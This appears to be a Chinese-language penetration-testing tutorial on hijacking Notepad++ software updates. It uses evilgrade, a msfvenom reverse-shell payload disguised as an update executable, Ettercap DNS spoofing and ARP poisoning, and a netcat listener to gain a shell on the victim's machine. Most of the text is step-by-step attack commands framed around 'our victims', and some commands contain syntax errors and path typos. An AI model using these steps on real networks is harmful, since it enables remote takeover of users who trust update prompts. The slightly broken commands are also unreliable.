0x01 概要
我們都看見這條消息 — —現在有可用的軟件更新!無一例外,我們相信此消息並下載的更新,大概是使我們更好地工作、 添加新功能,或使我們的系統更安全的系統。如果,相反,當我們要提示下載更新,我們的系統會給出一個惡意的黑客控制安裝惡意軟件?這是我們要對我們的受害者在這裡做什麼!
不同於其他黑客攻擊,這是一個獨立的,正是這樣的操作系統、 端口等。在這裡我們將濫用用戶信任,沒有一個操作系統或應用程序。
接下來將使用一個稱為evilgrade的軟件來劫持和升級/更新許多不同的軟件;不過注意,目前開發的isr-evilgrade僅限於少量的軟件更新和升級。
0x02 攻擊
Step 1:Kali安裝evilgrade
kali > apt-get install isr-evilgrade -y
安裝完成,執行evilgrade使用軟件
kali > evilgrade
正如你所看到的,evilgrade開始加載它的所有63個模塊。 每個模塊代表一個惡意軟件可以劫持其更新/升級的軟件應用程序。 要查看所有模塊,
kali > show modules
這兒我們使用軟件notepad++的更新實現中間人攻擊,所以這兒我們選擇notepad++相關的模塊
evilgrade > configure notepadplus
接下來我們可以查看notepad++模塊先關的參數
evilgrade > show options
Step 2:Metasploit生成payload
在這種情況下,我們將簡單地創建一個有效負載(以Metasploit的術語來說,這是一種惡意程序,我們將其放在受害者身上以控制受害者計算機)來安裝它以代替更新。
該命令將該有效負載放入名為notepadplus_update.exe的Windows .exe文件中。 首先,我們需要創建目錄來保存文件。 打開終端並鍵入;
kali > mkdir /root/evilgrade
kali > msfvenom windows/shell_reverse_tcp LHOST 192.168.1.118 LPORT=6996 X > /root/evigrade/notepadplus_update.exe
接下來指定notepad++更新文件在evilgrade路徑
evilgrade(notepadplus) > set agent /root/evilgrade/notepadplus_update.exe
啟動evilgrade服務
evilgrade (notepadplus) > start
Step 3:中間人DNS欺騙
現在我們已經設置了惡化,我們需要設置我們的MiTM攻擊。 這兒我們使用Ettercap實現dns欺騙。
我們將使用Ettercap重定向DNS查詢。 第一步是用您選擇的文本編輯器打開Ettercap中的etter.dns配置文件, 您可以使用任何適合您需求的文本編輯器。
kali > leafpad /etc/ettercap/etter.dns
我們增加一條記錄,其中IP地址為木馬文件地址
notepad-plus.sourceforge.net A 192.168.1.106
接下來我們設置Ettercap為混雜模式
kali > ettercap -G
軟件啟動起來,按Sniff -->Unified Sniffing
接下來使用dns_spoof插件模塊Plugins -->Manage Plugins -->dns_spoof
主機掃描Hosts --> scan hosts.
點擊就可以查看到主機存活列表 Hosts --> Hosts list
點擊APP欺騙Mitm --> Arp poisoning
選擇"Sniff Remote connections"
點擊"Start --> Start Sniffing"啟動欺騙
Step 4:使用Netcat監聽
這將在特定端口上打開一個偵聽器,以便從受害者機器接收連接。 記住我們創建的有效載荷是使用我們的IP地址和端口6996,監聽器必須使用相同的端口號。
kali >nc -l -p 6996
接下來我們在受害機上打開notepad++軟件,它會提醒我們更新軟件,我們直接選擇"Yes"
當用戶點擊“Yes”時,它將從我們的服務器更新並運行notepad++更新文件。 將創建的有效載荷將連接回我們的netcat監聽器,在受害者系統上打開一個shell!
儘管這種攻擊僅限於那些不使用數字證書進行身份驗證的軟件開發人員,但它內網滲透中也是一種滲透技巧。
閱讀更多 安全焦點 的文章